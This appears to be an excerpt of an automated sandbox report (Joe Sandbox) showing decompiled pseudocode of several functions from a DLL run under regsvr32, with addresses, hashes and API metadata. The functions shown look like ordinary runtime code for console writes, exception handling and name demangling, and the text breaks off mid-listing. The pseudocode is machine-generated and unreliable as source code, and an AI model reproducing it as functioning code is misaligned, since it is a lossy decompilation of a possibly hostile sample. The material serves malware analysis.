                                                                      				 *((long long*)(_t335 - 0x29)) = _t268;
                                                                      				r12d = r9d;
                                                                      				_t364 = _t363 + __r8;
                                                                      				 *((long long*)(_t335 - 0x71)) = _t364;
                                                                      				 *((intOrPtr*)(_t335 - 0x61)) = GetConsoleOutputCP();
                                                                      				if ( *((intOrPtr*)(_t366 + 0x28)) != dil) goto 0x80048950;
                                                                      				E00000001180006E80(_t268, __rcx, _t366, 0x180000000, __r8);
                                                                      				_t293 =  *((intOrPtr*)(_t366 + 0x18));
                                                                      				r8d =  *(_t293 + 0xc);
                                                                      				 *(_t335 - 0x5d) = r8d;
                                                                      				 *_t288 = _t268;
                                                                      				 *((intOrPtr*)(_t288 + 8)) = 0;
                                                                      				if ( *((intOrPtr*)(_t335 - 0x49)) - _t364 >= 0) goto 0x80048d10;
                                                                      				_t270 = __edx >> 6;
                                                                      				 *(_t335 - 0x21) = _t270;
                                                                      				 *((char*)(_t337 + 0x40)) =  *_t329;
                                                                      				 *((intOrPtr*)(_t335 - 0x7d)) = 0;
                                                                      				r12d = 1;
                                                                      				if (r8d != 0xfde9) goto 0x80048b18;
                                                                      				_t346 = 0x3e + _t374 * 8 +  *((intOrPtr*)(0x180000000 + 0x73d10 + _t270 * 8));
                                                                      				if ( *_t346 == dil) goto 0x800489cc;
                                                                      				_t371 = _t328 + 1;
                                                                      				if (_t371 - 5 < 0) goto 0x800489b9;
                                                                      				if (_t371 == 0) goto 0x80048aaa;
                                                                      				r12d =  *((char*)(_t293 + 0x1800729c0));
                                                                      				r12d = r12d + 1;
                                                                      				_t182 = r12d - 1;
                                                                      				 *((intOrPtr*)(_t335 - 0x69)) = _t182;
                                                                      				_t340 = _t182;
                                                                      				if (_t340 -  *((intOrPtr*)(_t335 - 0x71)) - _t329 > 0) goto 0x80048c7f;
                                                                      				_t294 = _t328;
                                                                      				 *((char*)(_t335 + _t294 - 1)) =  *_t346;
                                                                      				if (_t294 + 1 - _t371 < 0) goto 0x80048a11;
                                                                      				if (_t340 <= 0) goto 0x80048a42;
                                                                      				E00000001180004B10();
                                                                      				_t317 = _t328;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x73d10 +  *(_t335 - 0x59) * 8)) + _t317 + 0x3e + _t374 * 8)) = dil;
                                                                      				if (_t317 + 1 - _t371 < 0) goto 0x80048a45;
                                                                      				 *((long long*)(_t335 - 0x41)) = _t328;
                                                                      				_t275 = _t335 - 1;
                                                                      				 *((long long*)(_t335 - 0x39)) = _t275;
                                                                      				_t186 = (0 | r12d == 0x00000004) + 1;
                                                                      				r12d = _t186;
                                                                      				r8d = _t186;
                                                                      				 *((long long*)(_t337 + 0x20)) = _t366;
                                                                      				E0000000118004D908(_t275, _t288, _t335 - 0x7d, _t335 - 0x39, _t340, _t335 - 0x41);
                                                                      				if (_t275 == 0xffffffff) goto 0x80048d10;
                                                                      				_t330 = _t329 +  *((intOrPtr*)(_t335 - 0x69)) - 1;
                                                                      				goto 0x80048bad;
                                                                      				_t367 =  *((char*)(_t275 + 0x1800729c0));
                                                                      				_t212 = _t367 + 1;
                                                                      				_t342 =  *((intOrPtr*)(_t335 - 0x71)) - _t330;
                                                                      				if (_t212 - _t342 > 0) goto 0x80048cad;
                                                                      				 *((long long*)(_t335 - 0x69)) = _t328;
                                                                      				 *((long long*)(_t335 - 0x31)) = _t330;
                                                                      				_t193 = (0 | _t212 == 0x00000004) + 1;
                                                                      				r14d = _t193;
                                                                      				r8d = _t193;
                                                                      				_t277 =  *((intOrPtr*)(_t335 - 0x51));
                                                                      				 *((long long*)(_t337 + 0x20)) = _t277;
                                                                      				E0000000118004D908(_t277, _t288, _t335 - 0x7d, _t335 - 0x31, _t342, _t335 - 0x69);
                                                                      				if (_t277 == 0xffffffff) goto 0x80048d10;
                                                                      				_t331 = _t330 + _t367;
                                                                      				r12d = r14d;
                                                                      				goto 0x80048bad;
                                                                      				_t358 =  *(_t335 - 0x59);
                                                                      				_t350 =  *((intOrPtr*)(0x180000000 + 0x73d10 + _t358 * 8));
                                                                      				_t213 =  *(_t350 + 0x3d + _t374 * 8);
                                                                      				if ((_t213 & 0x00000004) == 0) goto 0x80048b4f;
                                                                      				 *((char*)(_t335 + 7)) =  *((intOrPtr*)(_t350 + 0x3e + _t374 * 8));
                                                                      				 *((char*)(_t335 + 8)) =  *_t331;
                                                                      				 *(_t350 + 0x3d + _t374 * 8) = _t213 & 0x000000fb;
                                                                      				r8d = 2;
                                                                      				goto 0x80048b98;
                                                                      				r8d =  *_t331 & 0x000000ff;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t335 - 0x51)) + 0x18)))) + _t342 * 2)) >= 0) goto 0x80048b92;
                                                                      				_t372 =  &(_t331[1]);
                                                                      				if (_t372 -  *((intOrPtr*)(_t335 - 0x71)) >= 0) goto 0x80048ceb;
                                                                      				r8d = 2;
                                                                      				if (E0000000118003E80C(_t213 & 0x000000fb, __ebp, _t288, _t335 - 0x7d, _t331, _t328, _t331, _t335, _t342,  *((intOrPtr*)(_t335 - 0x51))) == 0xffffffff) goto 0x80048d10;
                                                                      				_t332 = _t372;
                                                                      				goto 0x80048bad;
                                                                      				_t198 = E0000000118003E80C(_t213 & 0x000000fb, __ebp, _t288, _t335 - 0x7d, _t332, _t328, _t332, _t335, _t364,  *((intOrPtr*)(_t335 - 0x51)));
                                                                      				if (_t198 == 0xffffffff) goto 0x80048d10;
                                                                      				_t333 =  &(_t332[1]);
                                                                      				 *((long long*)(_t337 + 0x38)) = _t328;
                                                                      				 *((long long*)(_t337 + 0x30)) = _t328;
                                                                      				 *((intOrPtr*)(_t337 + 0x28)) = 5;
                                                                      				_t279 = _t335 + 0xf;
                                                                      				 *((long long*)(_t337 + 0x20)) = _t279;
                                                                      				r9d = r12d;
                                                                      				_t344 = _t335 - 0x7d;
                                                                      				E00000001180044AB4();
                                                                      				r14d = _t198;
                                                                      				if (_t198 == 0) goto 0x80048d10;
                                                                      				 *((long long*)(_t337 + 0x20)) = _t328;
                                                                      				r8d = _t198;
                                                                      				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x80048d08;
                                                                      				 *((intOrPtr*)(_t288 + 4)) = __esi -  *((intOrPtr*)(_t335 - 0x49)) +  *((intOrPtr*)(_t288 + 8));
                                                                      				if ( *((intOrPtr*)(_t335 - 0x79)) - r14d < 0) goto 0x80048d10;
                                                                      				if ( *((char*)(_t337 + 0x40)) != 0xa) goto 0x80048c68;
                                                                      				 *((short*)(_t337 + 0x40)) = 0xd;
                                                                      				 *((long long*)(_t337 + 0x20)) = _t328;
                                                                      				_t128 = _t279 - 0xc; // 0x1
                                                                      				r8d = _t128;
                                                                      				_t325 = _t337 + 0x40;
                                                                      				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x80048d08;
                                                                      				if ( *((intOrPtr*)(_t335 - 0x79)) - 1 < 0) goto 0x80048d10;
                                                                      				 *((intOrPtr*)(_t288 + 8)) =  *((intOrPtr*)(_t288 + 8)) + 1;
                                                                      				 *((intOrPtr*)(_t288 + 4)) =  *((intOrPtr*)(_t288 + 4)) + 1;
                                                                      				if (_t333 -  *((intOrPtr*)(_t335 - 0x71)) >= 0) goto 0x80048d10;
                                                                      				r8d =  *(_t335 - 0x5d);
                                                                      				goto 0x8004897b;
                                                                      				if (_t325 <= 0) goto 0x80048ca8;
                                                                      				_t334 = _t333 - _t372;
                                                                      				 *((char*)( *((intOrPtr*)(0x180000000 + 0x73d10 + _t358 * 8)) + _t372 + 0x3e + _t374 * 8)) =  *((intOrPtr*)(_t334 + _t372));
                                                                      				if (1 - _t325 < 0) goto 0x80048c87;
                                                                      				 *((intOrPtr*)(_t288 + 4)) =  *((intOrPtr*)(_t288 + 4)) +  *((intOrPtr*)(_t288 + 4));
                                                                      				goto 0x80048d10;
                                                                      				if (_t344 <= 0) goto 0x80048ce5;
                                                                      				_t326 = _t328;
                                                                      				_t360 =  *(_t335 - 0x19) >> 6;
                                                                      				_t355 =  *(_t335 - 0x11) +  *(_t335 - 0x11) * 8;
                                                                      				 *((char*)( *((intOrPtr*)(0x180000000 + 0x73d10 + _t360 * 8)) + _t355 * 8 + _t326 + 0x3e)) =  *((intOrPtr*)(_t326 + _t334));
                                                                      				_t327 = _t326 + 1;
                                                                      				if (2 - _t344 < 0) goto 0x80048cc5;
                                                                      				 *((intOrPtr*)(_t288 + 4)) =  *((intOrPtr*)(_t288 + 4)) + r8d;
                                                                      				goto 0x80048d10;
                                                                      				 *((char*)(_t355 + 0x3e + _t374 * 8)) =  *_t334;
                                                                      				 *( *((intOrPtr*)(0x180000000 + 0x73d10 + _t360 * 8)) + 0x3d + _t374 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x73d10 + _t360 * 8)) + 0x3d + _t374 * 8) | 0x00000004;
                                                                      				_t174 = _t327 + 1; // 0x1
                                                                      				 *((intOrPtr*)(_t288 + 4)) = _t174;
                                                                      				goto 0x80048d10;
                                                                      				 *_t288 = GetLastError();
                                                                      				return E00000001180002FB0(_t206,  *((intOrPtr*)(_t335 - 0x61)),  *(_t335 + 0x17) ^ _t337);
                                                                      			}




















































                                                                      0x1800488b0
                                                                      0x1800488be
                                                                      0x1800488c2
                                                                      0x1800488c9
                                                                      0x1800488d1
                                                                      0x1800488d5
                                                                      0x1800488df
                                                                      0x1800488e3
                                                                      0x1800488e6
                                                                      0x1800488ed
                                                                      0x1800488f0
                                                                      0x1800488f4
                                                                      0x1800488fb
                                                                      0x180048902
                                                                      0x180048906
                                                                      0x180048914
                                                                      0x180048918
                                                                      0x180048924
                                                                      0x180048929
                                                                      0x18004892d
                                                                      0x180048930
                                                                      0x180048933
                                                                      0x18004893d
                                                                      0x180048946
                                                                      0x18004894b
                                                                      0x180048950
                                                                      0x180048954
                                                                      0x180048958
                                                                      0x18004895e
                                                                      0x180048961
                                                                      0x180048968
                                                                      0x180048971
                                                                      0x180048975
                                                                      0x18004897d
                                                                      0x180048981
                                                                      0x180048984
                                                                      0x180048998
                                                                      0x1800489b3
                                                                      0x1800489bc
                                                                      0x1800489c0
                                                                      0x1800489ca
                                                                      0x1800489cf
                                                                      0x1800489e7
                                                                      0x1800489f0
                                                                      0x1800489f6
                                                                      0x1800489f8
                                                                      0x180048a02
                                                                      0x180048a08
                                                                      0x180048a0e
                                                                      0x180048a14
                                                                      0x180048a21
                                                                      0x180048a26
                                                                      0x180048a32
                                                                      0x180048a42
                                                                      0x180048a50
                                                                      0x180048a5b
                                                                      0x180048a5d
                                                                      0x180048a61
                                                                      0x180048a65
                                                                      0x180048a72
                                                                      0x180048a74
                                                                      0x180048a77
                                                                      0x180048a7a
                                                                      0x180048a8b
                                                                      0x180048a94
                                                                      0x180048aa2
                                                                      0x180048aa5
                                                                      0x180048aad
                                                                      0x180048ab6
                                                                      0x180048abe
                                                                      0x180048ac7
                                                                      0x180048acd
                                                                      0x180048ad1
                                                                      0x180048add
                                                                      0x180048adf
                                                                      0x180048ae2
                                                                      0x180048ae5
                                                                      0x180048ae9
                                                                      0x180048afa
                                                                      0x180048b03
                                                                      0x180048b09
                                                                      0x180048b0c
                                                                      0x180048b13
                                                                      0x180048b18
                                                                      0x180048b1c
                                                                      0x180048b24
                                                                      0x180048b2c
                                                                      0x180048b33
                                                                      0x180048b38
                                                                      0x180048b3e
                                                                      0x180048b43
                                                                      0x180048b4d
                                                                      0x180048b4f
                                                                      0x180048b5f
                                                                      0x180048b61
                                                                      0x180048b69
                                                                      0x180048b72
                                                                      0x180048b87
                                                                      0x180048b8d
                                                                      0x180048b90
                                                                      0x180048b9f
                                                                      0x180048ba7
                                                                      0x180048bad
                                                                      0x180048bb0
                                                                      0x180048bb5
                                                                      0x180048bba
                                                                      0x180048bc2
                                                                      0x180048bc6
                                                                      0x180048bcb
                                                                      0x180048bce
                                                                      0x180048bd7
                                                                      0x180048bdc
                                                                      0x180048be1
                                                                      0x180048be7
                                                                      0x180048bf0
                                                                      0x180048c06
                                                                      0x180048c14
                                                                      0x180048c1b
                                                                      0x180048c26
                                                                      0x180048c2d
                                                                      0x180048c32
                                                                      0x180048c3b
                                                                      0x180048c3b
                                                                      0x180048c3f
                                                                      0x180048c4f
                                                                      0x180048c59
                                                                      0x180048c5f
                                                                      0x180048c62
                                                                      0x180048c6c
                                                                      0x180048c76
                                                                      0x180048c7a
                                                                      0x180048c82
                                                                      0x180048c84
                                                                      0x180048c96
                                                                      0x180048ca6
                                                                      0x180048ca8
                                                                      0x180048cab
                                                                      0x180048cb0
                                                                      0x180048cb2
                                                                      0x180048cb9
                                                                      0x180048cc1
                                                                      0x180048cd4
                                                                      0x180048cda
                                                                      0x180048ce3
                                                                      0x180048ce5
                                                                      0x180048ce9
                                                                      0x180048ced
                                                                      0x180048cfa
                                                                      0x180048d00
                                                                      0x180048d03
                                                                      0x180048d06
                                                                      0x180048d0e
                                                                      0x180048d39

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID: MZx
                                                                      • API String ID: 2718003287-2575928145
                                                                      • Opcode ID: 1345baf26f24b8e30eda2841db4fcdb91f233dee62d1d6eb21627807539b72cb
                                                                      • Instruction ID: a3ece774d196e705673af51d3f984d2e5f27d7f1c5ed32676e5474041040a149
                                                                      • Opcode Fuzzy Hash: 1345baf26f24b8e30eda2841db4fcdb91f233dee62d1d6eb21627807539b72cb
                                                                      • Instruction Fuzzy Hash: 9ED1DF32B00A888AE752DF75D4803DC37B1F7487D8F258612EE5997B99DE34CA0AD704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 61%
                                                                      			E00000001180054954(void* __edx, intOrPtr* __rcx, void* __rdx, long long __r8, void* __r9) {
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* _t94;
                                                                      				intOrPtr _t95;
                                                                      				intOrPtr _t125;
                                                                      				void* _t136;
                                                                      				intOrPtr _t137;
                                                                      				signed long long _t143;
                                                                      				long long _t145;
                                                                      				long long _t150;
                                                                      				void* _t151;
                                                                      				intOrPtr* _t171;
                                                                      				long long _t182;
                                                                      				long long _t183;
                                                                      				intOrPtr* _t184;
                                                                      				void* _t185;
                                                                      				intOrPtr* _t186;
                                                                      				intOrPtr* _t187;
                                                                      				void* _t188;
                                                                      				signed long long _t189;
                                                                      				intOrPtr _t197;
                                                                      				void* _t204;
                                                                      				long long _t205;
                                                                      
                                                                      				_t187 = _t188 - 0x38;
                                                                      				_t189 = _t188 - 0x138;
                                                                      				_t143 =  *0x80072078; // 0xc949cbcab002
                                                                      				 *(_t187 + 0x28) = _t143 ^ _t189;
                                                                      				_t185 = __r9;
                                                                      				_t145 =  *((intOrPtr*)(_t187 + 0xb8));
                                                                      				_t204 = __rdx;
                                                                      				_t205 =  *((intOrPtr*)(_t187 + 0xa0));
                                                                      				_t186 = __rcx;
                                                                      				 *((long long*)(_t189 + 0x70)) = _t145;
                                                                      				 *((long long*)(_t189 + 0x78)) = __r8;
                                                                      				if ( *__rcx == 0x80000003) goto 0x80054c1d;
                                                                      				E0000000118002DD20(_t145);
                                                                      				r12d =  *((intOrPtr*)(_t187 + 0xb0));
                                                                      				r15d =  *((intOrPtr*)(_t187 + 0xa8));
                                                                      				if ( *((long long*)(_t145 + 0x10)) == 0) goto 0x80054a1c;
                                                                      				__imp__EncodePointer();
                                                                      				_t160 = _t145;
                                                                      				E0000000118002DD20(_t145);
                                                                      				if ( *((intOrPtr*)(_t145 + 0x10)) == _t145) goto 0x80054a1c;
                                                                      				if ( *__rcx == 0xe0434f4d) goto 0x80054a1c;
                                                                      				if ( *__rcx == 0xe0434352) goto 0x80054a1c;
                                                                      				 *((intOrPtr*)(_t189 + 0x38)) = r15d;
                                                                      				 *(_t189 + 0x30) =  *((intOrPtr*)(_t189 + 0x70));
                                                                      				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
                                                                      				 *((long long*)(_t189 + 0x20)) = _t205;
                                                                      				if (E000000011800424C0(__rcx, __rdx,  *((intOrPtr*)(_t189 + 0x78)), __r9) != 0) goto 0x80054c1d;
                                                                      				E00000001180051C94(_t187, _t205,  *((intOrPtr*)(__r9 + 8)));
                                                                      				if ( *_t187 <= 0) goto 0x80054c3d;
                                                                      				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
                                                                      				 *((long long*)(_t189 + 0x20)) = _t205;
                                                                      				r8d = r15d;
                                                                      				_t94 = E00000001180042120(_t145, _t187 - 0x70, _t187, _t185, __rcx, _t187);
                                                                      				asm("movups xmm0, [ebp-0x70]");
                                                                      				asm("movdqu [ebp-0x80], xmm0");
                                                                      				asm("psrldq xmm0, 0x8");
                                                                      				asm("movd eax, xmm0");
                                                                      				if (_t94 -  *((intOrPtr*)(_t187 - 0x58)) >= 0) goto 0x80054c1d;
                                                                      				_t95 =  *((intOrPtr*)(_t187 - 0x78));
                                                                      				 *((long long*)(_t189 + 0x68)) =  *((intOrPtr*)(_t187 - 0x70));
                                                                      				 *((intOrPtr*)(_t189 + 0x60)) = _t95;
                                                                      				asm("inc ecx");
                                                                      				asm("dec ax");
                                                                      				asm("movups [ebp-0x80], xmm0");
                                                                      				if (_t95 - r15d > 0) goto 0x80054b83;
                                                                      				_t136 = r15d - _t95;
                                                                      				if (_t136 > 0) goto 0x80054b83;
                                                                      				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x10))));
                                                                      				E00000001180051D7C( *((intOrPtr*)(_t185 + 0x10)), _t187 - 0x50, _t187 - 0x80,  *((intOrPtr*)(_t185 + 8)));
                                                                      				 *((long long*)(_t187 - 0x48)) =  *((intOrPtr*)(_t187 - 0x40));
                                                                      				E00000001180051EE0( *((intOrPtr*)(_t187 - 0x40)), _t187 - 0x50);
                                                                      				_t150 =  *((intOrPtr*)(_t187 - 0x40));
                                                                      				 *((long long*)(_t187 - 0x48)) = _t150;
                                                                      				E00000001180051EE0(_t150, _t187 - 0x50);
                                                                      				if (_t136 == 0) goto 0x80054afa;
                                                                      				E00000001180051EE0(_t150, _t187 - 0x50);
                                                                      				if (_t136 != 0) goto 0x80054aeb;
                                                                      				_t137 =  *((intOrPtr*)(_t187 - 0x30));
                                                                      				if (_t137 == 0) goto 0x80054b28;
                                                                      				E00000001180042288(_t150);
                                                                      				_t151 = _t150 +  *((intOrPtr*)(_t187 - 0x30));
                                                                      				if (_t137 == 0) goto 0x80054b28;
                                                                      				if (__edx == 0) goto 0x80054b20;
                                                                      				E00000001180042288(_t151);
                                                                      				goto 0x80054b22;
                                                                      				if ( *((char*)(_t151 +  *((intOrPtr*)(_t187 - 0x30)) + 0x10)) != 0) goto 0x80054b77;
                                                                      				if (( *(_t187 - 0x34) & 0x00000040) != 0) goto 0x80054b77;
                                                                      				 *((char*)(_t189 + 0x58)) = 0;
                                                                      				_t171 = _t186;
                                                                      				 *((char*)(_t189 + 0x50)) = 1;
                                                                      				 *((long long*)(_t189 + 0x48)) =  *((intOrPtr*)(_t189 + 0x70));
                                                                      				 *((intOrPtr*)(_t189 + 0x40)) = r12d;
                                                                      				 *((long long*)(_t189 + 0x38)) = _t187 - 0x80;
                                                                      				 *(_t189 + 0x30) =  *(_t189 + 0x30) & 0x00000000;
                                                                      				 *((long long*)(_t189 + 0x28)) = _t187 - 0x38;
                                                                      				 *((long long*)(_t189 + 0x20)) = _t205;
                                                                      				E00000001180054880(0, _t160 - 1, _t171, _t204,  *((intOrPtr*)(_t189 + 0x78)), _t185);
                                                                      				_t197 =  *((intOrPtr*)(_t189 + 0x68));
                                                                      				_t182 =  *((intOrPtr*)(_t197 + 8)) -  *((char*)(_t171 + 0x180060660));
                                                                      				 *((long long*)(_t197 + 8)) = _t182;
                                                                      				 *(_t197 + 0x18) =  *(_t182 - 4) >>  *(_t171 + 0x180060670);
                                                                      				_t183 = _t182 -  *((char*)(_t171 + 0x180060660));
                                                                      				 *((long long*)(_t197 + 8)) = _t183;
                                                                      				 *(_t197 + 0x1c) =  *(_t183 - 4) >>  *(_t171 + 0x180060670);
                                                                      				_t184 = _t183 -  *((char*)(_t171 + 0x180060660));
                                                                      				 *(_t197 + 0x20) =  *(_t184 - 4) >>  *(_t171 + 0x180060670);
                                                                      				_t82 = _t184 + 4; // 0x4
                                                                      				 *((long long*)(_t197 + 8)) = _t184;
                                                                      				 *((intOrPtr*)(_t197 + 0x24)) =  *_t184;
                                                                      				_t125 =  *((intOrPtr*)(_t189 + 0x60)) + 1;
                                                                      				 *((long long*)(_t197 + 8)) = _t82;
                                                                      				 *((intOrPtr*)(_t189 + 0x60)) = _t125;
                                                                      				if (_t125 -  *((intOrPtr*)(_t187 - 0x58)) < 0) goto 0x80054a85;
                                                                      				return E00000001180002FB0( *(_t184 - 4) >>  *(_t171 + 0x180060670), _t125,  *(_t187 + 0x28) ^ _t189);
                                                                      			}




























                                                                      0x180054961
                                                                      0x180054966
                                                                      0x18005496d
                                                                      0x180054977
                                                                      0x180054981
                                                                      0x180054984
                                                                      0x18005498b
                                                                      0x18005498e
                                                                      0x180054995
                                                                      0x180054998
                                                                      0x18005499d
                                                                      0x1800549a2
                                                                      0x1800549a8
                                                                      0x1800549ad
                                                                      0x1800549b4
                                                                      0x1800549c0
                                                                      0x1800549c4
                                                                      0x1800549ca
                                                                      0x1800549cd
                                                                      0x1800549d6
                                                                      0x1800549de
                                                                      0x1800549e6
                                                                      0x1800549f8
                                                                      0x180054a00
                                                                      0x180054a05
                                                                      0x180054a0a
                                                                      0x180054a16
                                                                      0x180054a27
                                                                      0x180054a30
                                                                      0x180054a36
                                                                      0x180054a42
                                                                      0x180054a47
                                                                      0x180054a4e
                                                                      0x180054a53
                                                                      0x180054a57
                                                                      0x180054a5c
                                                                      0x180054a61
                                                                      0x180054a68
                                                                      0x180054a79
                                                                      0x180054a7c
                                                                      0x180054a81
                                                                      0x180054a85
                                                                      0x180054a8a
                                                                      0x180054a8f
                                                                      0x180054a96
                                                                      0x180054aa0
                                                                      0x180054aa3
                                                                      0x180054ab9
                                                                      0x180054abc
                                                                      0x180054ac9
                                                                      0x180054acd
                                                                      0x180054ad2
                                                                      0x180054add
                                                                      0x180054ae1
                                                                      0x180054ae9
                                                                      0x180054aef
                                                                      0x180054af8
                                                                      0x180054afa
                                                                      0x180054afe
                                                                      0x180054b00
                                                                      0x180054b09
                                                                      0x180054b0c
                                                                      0x180054b10
                                                                      0x180054b12
                                                                      0x180054b1e
                                                                      0x180054b26
                                                                      0x180054b2c
                                                                      0x180054b3e
                                                                      0x180054b43
                                                                      0x180054b46
                                                                      0x180054b4b
                                                                      0x180054b54
                                                                      0x180054b59
                                                                      0x180054b62
                                                                      0x180054b68
                                                                      0x180054b6d
                                                                      0x180054b72
                                                                      0x180054b77
                                                                      0x180054b9e
                                                                      0x180054ba6
                                                                      0x180054baa
                                                                      0x180054bc5
                                                                      0x180054bcd
                                                                      0x180054bd1
                                                                      0x180054bec
                                                                      0x180054bf4
                                                                      0x180054bf8
                                                                      0x180054bfc
                                                                      0x180054c02
                                                                      0x180054c0a
                                                                      0x180054c0c
                                                                      0x180054c10
                                                                      0x180054c17
                                                                      0x180054c3c

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$MZx$RCC
                                                                      • API String ID: 3544855599-2476776655
                                                                      • Opcode ID: 6ff790f7ed5e16a0d150c49581a26af037dde2d0616db8da4c47d2c68e9db6df
                                                                      • Instruction ID: 6dc0cbb87896e698b211a7e174d859f520c86f1cefb65dce5e85177431553c15
                                                                      • Opcode Fuzzy Hash: 6ff790f7ed5e16a0d150c49581a26af037dde2d0616db8da4c47d2c68e9db6df
                                                                      • Instruction Fuzzy Hash: 5C913B73604B988AE792CB65E8803DD7BA5F3487C8F14811AFE496B755DF39C299CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 57%
                                                                      			E00000001180033210(long long __rbx, long long __rcx, intOrPtr* __rdx, long long __rdi, long long __r8, long long _a8, long long _a16) {
                                                                      				intOrPtr _v16;
                                                                      				char _v24;
                                                                      				intOrPtr _v32;
                                                                      				char _v40;
                                                                      				intOrPtr _t21;
                                                                      				char _t23;
                                                                      				char _t26;
                                                                      				void* _t31;
                                                                      				long long _t36;
                                                                      				char* _t44;
                                                                      				long long _t48;
                                                                      				char* _t50;
                                                                      				intOrPtr* _t53;
                                                                      				void* _t55;
                                                                      				long long _t60;
                                                                      				void* _t63;
                                                                      				void* _t64;
                                                                      
                                                                      				_t60 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rdi;
                                                                      				r8d = 0;
                                                                      				_t53 = __rdx;
                                                                      				_t44 =  *0x800738a8; // 0x0
                                                                      				_t36 = __rcx;
                                                                      				_v40 = __r8;
                                                                      				_v32 = r8d;
                                                                      				_t23 =  *_t44;
                                                                      				_t26 = _t23;
                                                                      				if (_t26 == 0) goto 0x800332d7;
                                                                      				if (_t26 == 0) goto 0x800332c8;
                                                                      				if (_t26 == 0) goto 0x80033295;
                                                                      				if (_t23 - 7 == 1) goto 0x80033264;
                                                                      				E00000001180033FA0(__rcx, __rcx, __rdx, __rdx, _t63, _t64);
                                                                      				goto 0x800332f5;
                                                                      				if ( *_t53 == _t60) goto 0x8003327c;
                                                                      				r8d = 9;
                                                                      				goto 0x80033289;
                                                                      				r8d = 8;
                                                                      				E0000000118003668C(_t23 - 7, _t31, _t36,  &_v40, "volatile", _t53, _t55);
                                                                      				_t48 =  *0x800738a8; // 0x0
                                                                      				r9d = 2;
                                                                      				_v24 =  *_t53;
                                                                      				asm("bts eax, 0x8");
                                                                      				 *0x800738a8 = _t48 + 1;
                                                                      				_t50 =  &_v40;
                                                                      				_v16 =  *((intOrPtr*)(_t53 + 8));
                                                                      				E00000001180034730(_t36, _t36, _t50, _t53, _t55,  &_v24);
                                                                      				goto 0x800332f5;
                                                                      				_t21 =  *((intOrPtr*)(_t50 + 1));
                                                                      				if (_t21 == 0x24) goto 0x80033308;
                                                                      				if (_t21 != 0) goto 0x80033406;
                                                                      				_v16 = r8d;
                                                                      				_v24 = 0x8005fee0;
                                                                      				return E0000000118002E98C( &_v24, _t36, _t53);
                                                                      			}




















                                                                      0x180033210
                                                                      0x180033210
                                                                      0x180033215
                                                                      0x180033222
                                                                      0x180033225
                                                                      0x180033228
                                                                      0x18003322f
                                                                      0x180033232
                                                                      0x180033236
                                                                      0x18003323a
                                                                      0x18003323d
                                                                      0x18003323f
                                                                      0x180033248
                                                                      0x18003324d
                                                                      0x180033252
                                                                      0x18003325a
                                                                      0x18003325f
                                                                      0x18003326b
                                                                      0x18003326d
                                                                      0x18003327a
                                                                      0x18003327c
                                                                      0x180033289
                                                                      0x18003328e
                                                                      0x180033295
                                                                      0x1800332a2
                                                                      0x1800332af
                                                                      0x1800332b3
                                                                      0x1800332ba
                                                                      0x1800332be
                                                                      0x1800332c1
                                                                      0x1800332c6
                                                                      0x1800332c8
                                                                      0x1800332cd
                                                                      0x1800332d1
                                                                      0x1800332de
                                                                      0x1800332e2
                                                                      0x180033307

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
